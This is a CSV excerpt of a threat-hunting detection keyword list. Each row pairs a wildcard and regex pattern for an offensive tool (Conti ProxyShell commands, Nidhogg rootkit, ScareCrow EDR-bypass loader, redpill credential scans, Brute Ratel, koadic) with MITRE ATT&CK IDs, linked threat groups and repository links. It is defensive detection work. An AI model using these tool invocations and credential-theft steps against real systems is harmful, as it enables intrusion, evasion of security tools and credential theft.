"*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*",".{0,1000}sc\s\-path\sc\:\\inetpub\\wwwroot\\aspnet_client\\test\.txt\s\-value\steset.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58046"
"*sc start nidhogg*",".{0,1000}sc\sstart\snidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","58050"
"*sc_inject_direct.exe*",".{0,1000}sc_inject_direct\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","58092"
"*sc_inject_indirect.exe*",".{0,1000}sc_inject_indirect\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","58093"
"*scada_default_userpass.txt*",".{0,1000}scada_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58095"
"*scan -T list_of_targets.txt*",".{0,1000}scan\s\-T\slist_of_targets\.txt.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","58096"
"*scan_with_trufflehog(*",".{0,1000}scan_with_trufflehog\(.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#content","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","58097"
"*scan4all -*",".{0,1000}scan4all\s\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58098"
"*scan4all -*.xml*",".{0,1000}scan4all\s\-.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58099"
"*scan4all -h*",".{0,1000}scan4all\s\-h.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58100"
"*scan4all -tp *",".{0,1000}scan4all\s\-tp\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58101"
"*scan4all.51pwn.com*",".{0,1000}scan4all\.51pwn\.com.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58102"
"*scan4all.51pwn.com/*",".{0,1000}scan4all\.51pwn\.com\/.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58103"
"*scan4all_*.*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58104"
"*scan4all_*.*_macOS_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58105"
"*scan4all_*.*_macOS_arm64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_arm64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58106"
"*scan4all_*.*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58107"
"*scan4all_*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58108"
"*scan4all_*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58109"
"*scan4all_windows_386.exe*",".{0,1000}scan4all_windows_386\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58110"
"*scan4all_windows_amd64.exe*",".{0,1000}scan4all_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58111"
"*scan4all-main*",".{0,1000}scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58112"
"*ScanInterception_x64.ps1*",".{0,1000}ScanInterception_x64\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58113"
"*scanless*",".{0,1000}scanless.{0,1000}","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/vesche/scanless","1","0","N/A","N/A","N/A","10","1120","169","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z","58114"
"*scanner/backdoor*",".{0,1000}scanner\/backdoor.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58115"
"*scannerport.go -*",".{0,1000}scannerport\.go\s\-.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","0","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","58116"
"*Scanners-Box*",".{0,1000}Scanners\-Box.{0,1000}","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","N/A","10","8459","2387","2024-11-11T10:23:21Z","2016-12-24T16:07:50Z","58117"
"*Scanning ConsoleHost_History for creds*",".{0,1000}Scanning\sConsoleHost_History\sfor\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58118"
"*Scanning credential store for creds!*",".{0,1000}Scanning\scredential\sstore\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58119"
"*Scanning for Sandboxie?*",".{0,1000}Scanning\sfor\sSandboxie\?.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","58120"
"*Scanning registry for winlogon creds*",".{0,1000}Scanning\sregistry\sfor\swinlogon\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58121"
"*Scanning Teamviewer for creds!*",".{0,1000}Scanning\sTeamviewer\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58122"
"*Scanning winlogon for crypted creds!*",".{0,1000}Scanning\swinlogon\sfor\scrypted\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58123"
"*ScanProcessForBadgerConfig*",".{0,1000}ScanProcessForBadgerConfig.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58124"
"*ScanTCPImplant*",".{0,1000}ScanTCPImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58125"
"*ScareCrow *-loader *",".{0,1000}ScareCrow\s.{0,1000}\-loader\s.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58126"
"*ScareCrow* -encryptionmode *",".{0,1000}ScareCrow.{0,1000}\s\-encryptionmode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58127"
"*ScareCrow* -Evasion*",".{0,1000}ScareCrow.{0,1000}\s\-Evasion.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58128"
"*ScareCrow* -Exec*",".{0,1000}ScareCrow.{0,1000}\s\-Exec.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58129"
